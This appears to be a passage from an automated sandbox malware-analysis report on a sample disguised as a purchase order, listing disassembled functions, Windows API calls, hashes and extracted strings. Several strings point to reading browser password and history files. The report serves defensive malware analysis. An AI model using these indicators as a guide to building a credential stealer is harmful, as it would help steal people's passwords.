                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                      • String ID: \StringFileInfo\
                                                                                                      • API String ID: 102104167-2245444037
                                                                                                      • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                      • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                      • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$PlacementWindow
                                                                                                      • String ID: AE
                                                                                                      • API String ID: 3548547718-685266089
                                                                                                      • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                      • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                      • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                      • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memicmpwcslen
                                                                                                      • String ID: @@@@$History
                                                                                                      • API String ID: 1872909662-685208920
                                                                                                      • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                      • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                      • String ID: </%s>
                                                                                                      • API String ID: 3400436232-259020660
                                                                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendmemset
                                                                                                      • String ID: AE$"
                                                                                                      • API String ID: 568519121-1989281832
                                                                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                      • String ID: caption
                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                      • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                      • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                      • String ID: MS Sans Serif
                                                                                                      • API String ID: 210187428-168460110
                                                                                                      • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                      • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                      • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                      • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 3384217055-0
                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                      • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                      APIs
                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889144086-0
                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                      APIs
                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                      • String ID:
                                                                                                      • API String ID: 1661045500-0
                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                      Strings
                                                                                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                      • API String ID: 1297977491-2063813899
                                                                                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040560C
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1549203181-0
                                                                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                      APIs
